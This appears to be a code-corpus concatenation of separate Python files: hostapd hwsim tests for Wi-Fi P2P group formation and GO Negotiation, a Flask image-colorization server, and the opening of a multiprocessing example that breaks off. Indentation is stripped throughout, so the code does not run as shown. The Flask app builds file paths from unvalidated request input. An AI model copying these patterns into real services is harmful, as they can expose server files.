def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
def test_grpform3_c(dev):
"""P2P group formation using PIN and re-init GO Negotiation (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
remove_group(dev[0], dev[1])
def test_grpform_pd(dev):
"""P2P group formation with PD-before-GO-Neg workaround"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
def test_grpform_ext_listen(dev):
"""P2P group formation with extended listen timing enabled"""
try:
if "FAIL" not in dev[0].global_request("P2P_EXT_LISTEN 100"):
raise Exception("Invalid P2P_EXT_LISTEN accepted")
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN 100 50000"):
raise Exception("Failed to set extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN 200 40000"):
raise Exception("Failed to set extended listen timing")
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], provdisc=True, r_dev=dev[1], r_listen=True)
check_grpform_results(i_res, r_res)
peer1 = dev[0].get_peer(dev[1].p2p_dev_addr())
if peer1['ext_listen_interval'] != "40000":
raise Exception("Extended listen interval not discovered correctly")
if peer1['ext_listen_period'] != "200":
raise Exception("Extended listen period not discovered correctly")
peer0 = dev[1].get_peer(dev[0].p2p_dev_addr())
if peer0['ext_listen_interval'] != "50000":
raise Exception("Extended listen interval not discovered correctly")
if peer0['ext_listen_period'] != "100":
raise Exception("Extended listen period not discovered correctly")
remove_group(dev[0], dev[1])
finally:
if "OK" not in dev[0].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
if "OK" not in dev[1].global_request("P2P_EXT_LISTEN"):
raise Exception("Failed to clear extended listen timing")
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
def test_go_neg_pbc_vs_pin(dev):
"""P2P GO Negotiation with one device using PBC and the other PIN"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " 12345670 display"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_go_neg_pin_vs_pbc(dev):
"""P2P GO Negotiation with one device using PIN and the other PBC"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display auth"):
raise Exception("Failed to authorize GO Neg")
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
if "status=10" not in ev:
raise Exception("Unexpected failure reason: " + ev)
def test_grpform_per_sta_psk(dev):
"""P2P group formation with per-STA PSKs"""
dev[0].request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
pin = dev[2].wps_read_pin()
dev[0].p2p_go_authorize_client(pin)
c_res = dev[2].p2p_connect_group(dev[0].p2p_dev_addr(), pin, timeout=60)
check_grpform_results(i_res, c_res)
if r_res['psk'] == c_res['psk']:
raise Exception("Same PSK assigned for both clients")
hwsim_utils.test_connectivity_p2p(dev[1], dev[2])
dev[0].remove_group()
dev[1].wait_go_ending_session()
dev[2].wait_go_ending_session()
def test_grpform_per_sta_psk_wps(dev):
"""P2P group formation with per-STA PSKs with non-P2P WPS STA"""
dev[0].request("P2P_SET per_sta_psk 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[0].p2p_go_authorize_client_pbc()
dev[2].request("WPS_PBC")
dev[2].wait_connected(timeout=30)
hwsim_utils.test_connectivity_p2p_sta(dev[1], dev[2])
dev[0].remove_group()
dev[2].request("DISCONNECT")
dev[1].wait_go_ending_session()
def test_grpform_force_chan_go(dev):
"""P2P group formation forced channel selection by GO"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
i_freq=2432,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2432":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_cli(dev):
"""P2P group formation forced channel selection by client"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2417,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2417":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_conflict(dev):
"""P2P group formation fails due to forced channel mismatch"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15, r_freq=2427,
expect_failure=True, i_go_neg_status=7)
def test_grpform_pref_chan_go(dev):
"""P2P group formation preferred channel selection by GO"""
dev[0].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2442":
raise Exception("Unexpected channel - did not follow GO's p2p_pref_chan")
remove_group(dev[0], dev[1])
def test_grpform_pref_chan_go_overridden(dev):
"""P2P group formation preferred channel selection by GO overridden by client"""
dev[1].request("SET p2p_pref_chan 81:7")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2422,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2422":
raise Exception("Unexpected channel - did not follow client's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_forcing_chan(dev):
"""P2P group formation with no-GO freq forcing channel"""
dev[1].request("SET p2p_no_go_freq 100-200,300,4000-6000")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow no-GO freq")
remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_conflict(dev):
"""P2P group formation fails due to no-GO range forced by client"""
dev[1].request("SET p2p_no_go_freq 2000-3000")
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15,
expect_failure=True, i_go_neg_status=7)
def test_grpform_no_5ghz_world_roaming(dev):
"""P2P group formation with world roaming regulatory"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=14,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli2(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=14,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli3(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli4(dev):
"""P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse; intent 15)"""
dev[0].request("SET p2p_add_cli_chan 1")
dev[1].request("SET p2p_add_cli_chan 1")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0,
test_data=False)
check_grpform_results(i_res, r_res)
if int(i_res['freq']) > 4000:
raise Exception("Unexpected channel - did not follow world roaming rules")
remove_group(dev[0], dev[1])
def test_grpform_incorrect_pin(dev):
"""P2P GO Negotiation with incorrect PIN"""
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer not found")
res = dev[1].request("P2P_CONNECT " + dev[0].p2p_dev_addr() + " pin auth go_intent=0")
if "FAIL" in res:
raise Exception("P2P_CONNECT failed to generate PIN")
logger.info("PIN from P2P_CONNECT: " + res)
dev[0].request("P2P_CONNECT " + addr1 + " 00000000 enter go_intent=15")
ev = dev[0].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation did not complete successfully(0)")
ev = dev[1].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
if ev is None:
raise Exception("GO Negotiation did not complete successfully(1)")
ev = dev[1].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS failure not reported(1)")
if "msg=8 config_error=18" not in ev:
raise Exception("Unexpected WPS failure(1): " + ev)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS failure not reported")
if "msg=8 config_error=18" not in ev:
raise Exception("Unexpected WPS failure: " + ev)
ev = dev[1].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=10)
if ev is None:
raise Exception("Group formation failure timed out")
ev = dev[0].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=5)
if ev is None:
raise Exception("Group formation failure timed out")
def test_grpform_reject(dev):
"""User rejecting group formation attempt by a P2P peer"""
addr0 = dev[0].p2p_dev_addr()
dev[0].p2p_listen()
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
if "OK" in dev[0].global_request("P2P_REJECT foo"):
raise Exception("Invalid P2P_REJECT accepted")
if "FAIL" in dev[0].global_request("P2P_REJECT " + ev.split(' ')[1]):
raise Exception("P2P_REJECT failed")
dev[1].request("P2P_STOP_FIND")
dev[1].p2p_go_neg_init(addr0, None, "pbc")
ev = dev[1].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=11" not in ev:
raise Exception("Unexpected status code in rejection")
def test_grpform_pd_no_probe_resp(dev):
"""GO Negotiation after PD, but no Probe Response"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Peer not found")
dev[1].p2p_stop_find()
dev[0].p2p_stop_find()
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from Probe Request")
time.sleep(0.3)
dev[0].request("P2P_FLUSH")
dev[0].p2p_listen()
dev[1].global_request("P2P_PROV_DISC " + addr0 + " display")
ev = dev[0].wait_global_event(["P2P-PROV-DISC-SHOW-PIN"], timeout=5)
if ev is None:
raise Exception("PD Request timed out")
ev = dev[1].wait_global_event(["P2P-PROV-DISC-ENTER-PIN"], timeout=5)
if ev is None:
raise Exception("PD Response timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] != '0':
raise Exception("Peer listen frequency learned unexpectedly from PD Request")
pin = dev[0].wps_read_pin()
if "FAIL" in dev[1].request("P2P_CONNECT " + addr0 + " " + pin + " enter"):
raise Exception("P2P_CONNECT on initiator failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("GO Negotiation start timed out")
peer = dev[0].get_peer(addr1)
if peer['listen_freq'] == '0':
raise Exception("Peer listen frequency not learned from PD followed by GO Neg Req")
if "FAIL" in dev[0].request("P2P_CONNECT " + addr1 + " " + pin + " display"):
raise Exception("P2P_CONNECT on responder failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
def test_go_neg_two_peers(dev):
"""P2P GO Negotiation rejected due to already started negotiation with another peer"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
dev[1].p2p_listen()
dev[2].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
if not dev[0].discover_peer(addr2):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr2 + " pbc auth"):
raise Exception("Failed to authorize GO Neg")
dev[0].p2p_listen()
if not dev[2].discover_peer(addr0):
raise Exception("Could not discover peer")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc"):
raise Exception("Failed to initiate GO Neg")
ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
if ev is None:
raise Exception("timeout on GO Neg RX event")
dev[2].request("P2P_CONNECT " + addr0 + " pbc")
ev = dev[2].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("Rejection not reported")
if "status=5" not in ev:
raise Exception("Unexpected status code in rejection: " + ev)
def clear_pbc_overlap(dev, ifname):
hapd_global = hostapd.HostapdGlobal()
hapd_global.remove(ifname)
dev[0].request("P2P_CANCEL")
dev[1].request("P2P_CANCEL")
dev[0].p2p_stop_find()
dev[1].p2p_stop_find()
dev[0].dump_monitor()
dev[1].dump_monitor()
time.sleep(0.1)
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
time.sleep(0.1)
def test_grpform_pbc_overlap(dev, apdev):
"""P2P group formation during PBC overlap"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
time.sleep(0.1)
# Since P2P Client scan case is now optimzied to use a specific SSID, the
# WPS AP will not reply to that and the scan after GO Negotiation can quite
# likely miss the AP due to dwell time being short enoguh to miss the Beacon
# frame. This has made the test case somewhat pointless, but keep it here
# for now with an additional scan to confirm that PBC detection works if
# there is a BSS entry for a overlapping AP.
for i in range(0, 5):
dev[0].scan(freq="2412")
if dev[0].get_bss(apdev[0]['bssid']) is not None:
break
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_pbc_overlap_group_iface(dev, apdev):
"""P2P group formation during PBC overlap using group interfaces"""
# Note: Need to include P2P IE from the AP to get the P2P interface BSS
# update use this information.
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1",
"beacon_int": "15", 'manage_p2p': '1' }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
hapd.request("WPS_PBC")
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[0].p2p_listen()
if not dev[1].discover_peer(addr0):
raise Exception("Could not discover peer")
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Could not discover peer")
dev[0].p2p_stop_find()
dev[0].scan(freq="2412")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
raise Exception("Failed to authorize GO Neg")
if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
raise Exception("Failed to initiate GO Neg")
ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED",
"P2P-GROUP-FORMATION-SUCCESS"], timeout=15)
if ev is None or "WPS-OVERLAP-DETECTED" not in ev:
# Do not report this as failure since the P2P group formation case
# using a separate group interface has limited chances of "seeing" the
# overlapping AP due to a per-SSID scan and no prior scan operations on
# the group interface.
logger.info("PBC overlap not reported")
clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_goneg_fail_with_group_iface(dev):
"""P2P group formation fails while using group interface"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].p2p_listen()
peer = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(peer):
raise Exception("Peer " + peer + " not found")
if "OK" not in dev[1].request("P2P_REJECT " + dev[0].p2p_dev_addr()):
raise Exception("P2P_REJECT failed")
if "OK" not in dev[0].request("P2P_CONNECT " + peer + " pbc"):
raise Exception("P2P_CONNECT failed")
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
if ev is None:
raise Exception("GO Negotiation failure timed out")
def test_grpform_cred_ready_timeout(dev, apdev, params):
"""P2P GO Negotiation wait for credentials to become ready [long]"""
if not params['long']:
raise HwsimSkip("Skip test case with long duration due to --long not specified")
dev[1].p2p_listen()
addr1 = dev[1].p2p_dev_addr()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
if not dev[2].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found(2)")
start = os.times()[4]
cmd = "P2P_CONNECT " + addr1 + " 12345670 display"
if "OK" not in dev[0].global_request(cmd):
raise Exception("Failed to initiate GO Neg")
if "OK" not in dev[2].global_request(cmd):
raise Exception("Failed to initiate GO Neg(2)")
# First, check with p2p_find
ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=30)
if ev is not None:
raise Exception("Too early GO Negotiation timeout reported(2)")
dev[2].dump_monitor()
logger.info("Starting p2p_find to change state")
dev[2].p2p_find()
ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=100)
if ev is None:
raise Exception("GO Negotiation failure timed out(2)")
dev[2].dump_monitor()
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds(2)".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time(2): {}".format(end - start))
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
wpas.p2p_listen()
ev = dev[2].wait_global_event(["P2P-DEVICE-FOUND"], timeout=10)
if ev is None:
raise Exception("Did not discover new device after GO Negotiation failure")
if wpas.p2p_dev_addr() not in ev:
raise Exception("Unexpected device found: " + ev)
dev[2].p2p_stop_find()
wpas.p2p_stop_find()
# Finally, verify without p2p_find
ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=120)
if ev is None:
raise Exception("GO Negotiation failure timed out")
end = os.times()[4]
logger.info("GO Negotiation wait time: {} seconds".format(end - start))
if end - start < 120:
raise Exception("Too short GO Negotiation wait time: {}".format(end - start))
def test_grpform_no_wsc_done(dev):
"""P2P group formation with WSC-Done not sent"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
for i in range(0, 2):
dev[0].request("SET ext_eapol_frame_io 1")
dev[1].request("SET ext_eapol_frame_io 1")
dev[0].p2p_listen()
dev[1].p2p_go_neg_auth(addr0, "12345670", "display", 0)
dev[1].p2p_listen()
dev[0].p2p_go_neg_init(addr1, "12345670", "enter", timeout=20,
go_intent=15, wait_group=False)
mode = None
while True:
ev = dev[0].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from GO")
if not mode:
mode = dev[0].get_status_field("mode")
res = dev[1].request("EAPOL_RX " + addr0 + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[1].wait_event(["EAPOL-TX"], timeout=15)
if ev is None:
raise Exception("Timeout on EAPOL-TX from P2P Client")
msg = ev.split(' ')[2]
if msg[46:56] == "102200010f":
logger.info("Drop WSC_Done")
dev[0].request("SET ext_eapol_frame_io 0")
dev[1].request("SET ext_eapol_frame_io 0")
# Fake EAP-Failure to complete session on the client
id = msg[10:12]
dev[1].request("EAPOL_RX " + addr0 + " 0300000404" + id + "0004")
break
res = dev[0].request("EAPOL_RX " + addr1 + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on GO")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out on P2P Client")
dev[0].remove_group()
if mode != "P2P GO - group formation":
raise Exception("Unexpected mode on GO during group formation: " + mode)
def test_grpform_wait_peer(dev):
"""P2P group formation wait for peer to become ready"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
if not dev[0].discover_peer(addr1):
raise Exception("Peer " + addr1 + " not found")
dev[0].request("SET extra_roc_dur 500")
if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display go_intent=15"):
raise Exception("Failed to initiate GO Neg")
time.sleep(3)
dev[1].request("P2P_CONNECT " + addr0 + " 12345670 enter go_intent=0")
ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
dev[0].request("SET extra_roc_dur 0")
ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
if ev is None:
raise Exception("Group formation timed out")
dev[0].remove_group()
def test_invalid_p2p_connect_command(dev):
"""P2P_CONNECT error cases"""
id = dev[0].add_network()
for cmd in [ "foo",
"00:11:22:33:44:55",
"00:11:22:33:44:55 pbc persistent=123",
"00:11:22:33:44:55 pbc persistent=%d" % id,
"00:11:22:33:44:55 pbc go_intent=-1",
"00:11:22:33:44:55 pbc go_intent=16",
"00:11:22:33:44:55 pin",
"00:11:22:33:44:55 pbc freq=0" ]:
if "FAIL" not in dev[0].request("P2P_CONNECT " + cmd):
raise Exception("Invalid P2P_CONNECT command accepted: " + cmd)
if "FAIL-INVALID-PIN" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 1234567"):
raise Exception("Invalid PIN was not rejected")
if "FAIL-CHANNEL-UNSUPPORTED" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 pin freq=3000"):
raise Exception("Unsupported channel not reported")
def test_p2p_unauthorize(dev):
"""P2P_UNAUTHORIZE to unauthorize a peer"""
if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE foo"):
raise Exception("Invalid P2P_UNAUTHORIZE accepted")
if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE 00:11:22:33:44:55"):
raise Exception("P2P_UNAUTHORIZE for unknown peer accepted")
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
dev[1].p2p_listen()
pin = dev[0].wps_read_pin()
dev[0].p2p_go_neg_auth(addr1, pin, "display")
dev[0].p2p_listen()
if "OK" not in dev[0].request("P2P_UNAUTHORIZE " + addr1):
raise Exception("P2P_UNAUTHORIZE failed")
dev[1].p2p_go_neg_init(addr0, pin, "keypad", timeout=0)
ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=10)
if ev is None:
raise Exception("No GO Negotiation Request RX reported")
def test_grpform_pbc_multiple(dev):
"""P2P group formation using PBC multiple times in a row"""
try:
dev[1].request("SET passive_scan 1")
for i in range(5):
[i_res, r_res] = go_neg_pbc_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
remove_group(dev[0], dev[1])
finally:
dev[1].request("SET passive_scan 0")
dev[1].flush_scan_cache()
|
app.py | from queue import Empty, Queue
import threading, time, uuid, os
from flask import (
Flask, send_file, request, Response, render_template,
)
import torch
from data import colorize_image as CI
from skimage import color as skiColor
import numpy as np
from io import BytesIO
from PIL import Image, ImageColor
colorModel = CI.ColorizeImageTorch(Xd=256)
gpu_id = 0 if torch.cuda.is_available() else None
colorModel.prep_net(gpu_id=gpu_id, path='./models/pytorch/caffemodel.pth')
app = Flask(__name__)
requestsQueue = Queue()
BATCH_SIZE = 1
CHECK_INTERVAL = 0.1
def handle_requests_by_batch():
while True:
requestsBatch = []
while not (len(requestsBatch) >= BATCH_SIZE):
try:
requestsBatch.append(requestsQueue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
for request in requestsBatch:
request['output'] = run(request['input'][0], request['input'][1], request['input'][2])
threading.Thread(target=handle_requests_by_batch).start()
def put_point(inputAb, mask, loc, p, val):
inputAb[:, loc[0] - p: loc[0] + p + 1, loc[1] - p : loc[1] + p + 1] = np.array(val)[:, np.newaxis, np.newaxis]
mask[:, loc[0] - p : loc[0] + p + 1, loc[1] - p : loc[1] + p + 1] = 1
return (inputAb, mask)
def run(file, labArr, position):
try:
filename = uuid.uuid1()
tempFilePath = f'./input/{filename}.{file.content_type.split("/")[-1]}'
image = Image.open(file)
image = image.resize([256, 256])
image.save(tempFilePath)
colorModel.load_image(tempFilePath)
inputAb = np.zeros((2, 256, 256))
mask = np.zeros((1, 256, 256))
(inputAb, mask) = put_point(inputAb, mask, position, 3, [labArr[1], labArr[2]])
colorModel.net_forward(inputAb, mask)
imgOutFullRes = colorModel.get_img_fullres()
pilImage = Image.fromarray(np.uint8(imgOutFullRes)).convert('RGB')
result = BytesIO()
pilImage.save(result, format=file.content_type.split("/")[-1])
result.seek(0)
os.remove(tempFilePath)
return result
except Exception as e:
return "error"
@app.route('/ideepcolor', methods=['POST'])
def ideepcolor():
if requestsQueue.qsize() > BATCH_SIZE:
return Response('Too Many Requests', status=429)
try:
file = request.files['image']
color = request.form['color']
positionX = request.form['positionX']
positionY = request.form['positionY']
except:
return Response("Bad Request", status=400)
rgbArray = ImageColor.getrgb(color)
rgbNumpyArr = np.array((rgbArray[0], rgbArray[1], rgbArray[2])).astype('uint8')
labArr = skiColor.rgb2lab(rgbNumpyArr[np.newaxis, np.newaxis, :]).flatten()
position = [int(positionY), int(positionX)]
req = {
'input': [file, labArr, position]
}
requestsQueue.put(req)
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
io = req['output']
if io == "error":
return Response('Server Error', status=500)
return send_file(io, mimetype=f'image/{file.content_type.split("/")[-1]}')
@app.route('/test_imgs/<file_path>')
def get_test_image(file_path: str):
return send_file('./test_imgs/' + file_path)
@app.route('/', methods=['GET'])
def main():
return render_template('index.html')
@app.route('/healthz', methods=['GET'])
def healthz():
return 'ok'
if __name__ == "__main__":
app.run(host="0.0.0.0", port="5000") |
2.Multiprocessing.Queue.py | # -*- coding: utf-8 -*-
import multiprocessing
def writer_proc(q):
try:
